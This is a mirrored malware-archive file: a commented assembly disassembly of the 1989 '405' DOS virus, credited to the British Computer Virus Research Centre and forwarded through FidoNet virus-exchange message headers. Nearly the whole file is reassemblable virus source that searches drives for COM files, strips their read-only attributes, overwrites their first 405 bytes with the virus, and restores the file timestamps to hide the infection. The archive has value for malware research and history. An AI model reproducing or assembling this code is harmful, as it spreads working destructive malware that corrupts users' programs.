mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 08:15:27 +00:00
4b9382ddbc
push
239 lines
8.6 KiB
NASM
239 lines
8.6 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 44 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:16
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : 405_B.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Doug Bryce, 2:283/718 (06 Nov 94 17:51)
|
||
;* To : Mike Nisbett
|
||
;* Subj : 405_B.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Doug.Bryce@f718.n283.z2.fidonet.org
|
||
title The '405' virus
|
||
page 65,132
|
||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||
; ú British Computer Virus Research Centre ú
|
||
; ú 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ú
|
||
; ú Telephone: Domestic 0273-26105, International +44-273-26105 ú
|
||
; ú ú
|
||
; ú The '405' Virus ú
|
||
; ú Disassembled by Joe Hirst, March 1989 ú
|
||
; ú ú
|
||
; ú Copyright (c) Joe Hirst 1989. ú
|
||
; ú ú
|
||
; ú This listing is only to be made available to virus researchers ú
|
||
; ú or software writers on a need-to-know basis. ú
|
||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||
|
||
; The virus overwrites the first 405 bytes of a COM file. If the
|
||
; length of the COM file is less than this, the length is increased
|
||
; to 405 bytes.
|
||
|
||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||
|
||
BUFFER SEGMENT AT 0
|
||
|
||
ORG 295H
|
||
DW0295 DW ?
|
||
DB0297 DB ?
|
||
|
||
ORG 0E000H
|
||
DWE000 DW ? ; Read buffer area
|
||
|
||
ORG 0E195H
|
||
DWE195 DW ? ; Program after virus
|
||
|
||
BUFFER ENDS
|
||
|
||
CODE SEGMENT BYTE PUBLIC 'CODE'
|
||
ASSUME CS:CODE,DS:NOTHING,ES:BUFFER
|
||
|
||
VIRLEN EQU OFFSET ENDADR-START
|
||
ORG 100H
|
||
|
||
START: XCHG SI,AX
|
||
ADD [BX+SI],AL
|
||
SAHF
|
||
ADD [BX+SI],AL
|
||
NOP
|
||
|
||
MOV AX,0 ; Clear register
|
||
MOV ES:DB0249,AL ; Set current disk to default
|
||
MOV ES:DB024B,AL ; Set pathname store to zero
|
||
MOV ES:DB028B,AL ; Set number of drives to zero
|
||
PUSH AX
|
||
MOV AH,19H ; Get current disk function
|
||
INT 21H ; DOS service
|
||
MOV ES:DB0249,AL ; Save current disk
|
||
MOV AH,47H ; Get current directory function
|
||
ADD AL,1 ; Next drive (A)
|
||
PUSH AX
|
||
MOV DL,AL ; Drive A
|
||
LEA SI,DB024B ; Pathname store
|
||
INT 21H ; DOS service
|
||
POP AX
|
||
MOV AH,0EH ; Select disk function
|
||
SUB AL,1 ; Convert drive for select function
|
||
MOV DL,AL ; Move drive
|
||
INT 21H ; DOS service
|
||
MOV ES:DB028B,AL ; Save number of drives
|
||
BP0139: MOV AL,ES:DB0249 ; Get current disk
|
||
CMP AL,0 ; Is drive A?
|
||
JNZ BP0152 ; Branch if not
|
||
MOV AH,0EH ; Select disk function
|
||
MOV DL,2 ; Change drive to B
|
||
INT 21H ; DOS service
|
||
MOV AH,19H ; Get current disk function
|
||
INT 21H ; DOS service
|
||
MOV ES:DB024A,AL ; Save new current drive
|
||
JMP BP0179
|
||
|
||
BP0152: CMP AL,1 ; Is drive B?
|
||
JNZ BP0167 ; Branch if not
|
||
MOV AH,0EH ; Select disk function
|
||
MOV DL,2 ; Change drive to C
|
||
INT 21H ; DOS service
|
||
MOV AH,19H ; Get current disk function
|
||
INT 21H ; DOS service
|
||
MOV ES:DB024A,AL ; Save new current drive
|
||
JMP BP0179
|
||
|
||
BP0167: CMP AL,2 ; Is drive C?
|
||
JNZ BP0179 ; Branch if not
|
||
MOV AH,0EH ; Select disk function
|
||
MOV DL,0 ; Change drive to A
|
||
INT 21H ; DOS service
|
||
MOV AH,19H ; Get current disk function
|
||
INT 21H ; DOS service
|
||
MOV ES:DB024A,AL ; Save new current drive
|
||
BP0179: MOV AH,4EH ; Find first file function
|
||
MOV CX,1 ; Find read-only files, not system
|
||
LEA DX,DB028C ; Path '*.COM'
|
||
INT 21H ; DOS service
|
||
JB BP0189 ; Branch if error
|
||
JMP BP01A9 ; Process COM file
|
||
|
||
BP0189: MOV AH,3BH ; Change current directory function
|
||
LEA DX,DB0297 ; Directory pathname (this is past the end)
|
||
INT 21H ; DOS service
|
||
MOV AH,4EH ; Find first file function
|
||
MOV CX,0011H ; Find directory and read-only
|
||
LEA DX,DB0292 ; Path '*'
|
||
INT 21H ; DOS service
|
||
JB BP0139 ; Branch if error
|
||
JMP BP0179 ; Find a COM file
|
||
|
||
BP01A0: MOV AH,4FH ; Find next file function
|
||
INT 21H ; DOS service
|
||
JB BP0189 ; Branch if error
|
||
JMP BP01A9 ; Process COM file
|
||
|
||
; Process COM file
|
||
|
||
BP01A9: MOV AH,3DH ; Open handle function
|
||
MOV AL,2 ; R/W access
|
||
MOV DX,009EH ; File pathname
|
||
INT 21H ; DOS service
|
||
MOV BX,AX ; Move handle
|
||
MOV AH,3FH ; Read handle function
|
||
MOV CX,VIRLEN ; Length of virus
|
||
NOP
|
||
MOV DX,OFFSET DWE000 ; Read it in way down there
|
||
NOP
|
||
INT 21H ; DOS service
|
||
MOV AH,3EH ; Close handle function
|
||
INT 21H ; DOS service
|
||
MOV BX,DWE000 ; Get first word of COM file
|
||
CMP BX,9600H ; Is it infected? (should be 0096H)
|
||
JZ BP01A0 ; Yes, find another one
|
||
MOV AH,43H ; \ Get file attributes function
|
||
MOV AL,0 ; /
|
||
MOV DX,009EH ; File pathname
|
||
INT 21H ; DOS service
|
||
MOV AH,43H ; \ Set file attributes function
|
||
MOV AL,1 ; /
|
||
AND CX,00FEH ; Set off read only attribute
|
||
INT 21H ; DOS service
|
||
MOV AH,3DH ; Open handle function
|
||
MOV AL,2 ; R/W mode
|
||
MOV DX,009EH ; File pathname
|
||
INT 21H ; DOS service
|
||
MOV BX,AX ; Move handle
|
||
MOV AH,57H ; \ Get file date & time function
|
||
MOV AL,0 ; /
|
||
INT 21H ; DOS service
|
||
PUSH CX
|
||
PUSH DX
|
||
ASSUME ES:NOTHING
|
||
MOV DX,CS:DW0295 ; Get word after virus here
|
||
MOV CS:DWE195,DX ; Move to same position in prog
|
||
MOV DX,CS:DWE000+1 ; Get displacement from initial jump
|
||
LEA CX,DB0294-100H ; Length of virus minus one
|
||
SUB DX,CX
|
||
MOV CS:DW0295,DX ; Store in word after virus
|
||
MOV AH,40H ; Write handle function
|
||
MOV CX,VIRLEN ; Length of virus
|
||
NOP
|
||
LEA DX,START ; Beginning of virus
|
||
INT 21H ; DOS service
|
||
MOV AH,57H ; \ Set file date & time function
|
||
MOV AL,1 ; /
|
||
POP DX
|
||
POP CX
|
||
INT 21H ; DOS service
|
||
MOV AH,3EH ; Close handle function
|
||
INT 21H ; DOS service
|
||
MOV DX,CS:DWE195 ; Get word after virus
|
||
MOV CS:DW0295,DX ; Move to same position here
|
||
JMP BP0234
|
||
|
||
BP0234: MOV AH,0EH ; Select disk function
|
||
MOV DL,CS:DB0249 ; Get current disk
|
||
INT 21H ; DOS service
|
||
MOV AH,3BH ; Change current directory function
|
||
LEA DX,DB024A ; Address of path - this is incorrect
|
||
INT 21H ; DOS service
|
||
MOV AH,0 ; Terminate program function
|
||
INT 21H ; DOS service
|
||
|
||
DB0249 DB 2 ; Current disk
|
||
DB024A DB 0 ; New current drive
|
||
|
||
; There should be an extra byte at this point containing '\'
|
||
; for use by the change directory function - this is why that
|
||
; function is pointing at the previous field
|
||
|
||
DB024B DB 'TEST', 3CH DUP (0)
|
||
DB028B DB 0DH ; Number of drives
|
||
DB028C DB '*.COM', 0
|
||
DB0292 DB '*', 0
|
||
DB0294 DB 0E9H
|
||
|
||
ENDADR EQU $
|
||
|
||
CODE ENDS
|
||
|
||
END START
|
||
|
||
;-+- FidoPCB v1.4 [NR]
|
||
; + Origin: FidoNet * Mathieu Not‚ris * Brussels-Belgium-Europe (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/uxxxx Set version emulation, version xxxx
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|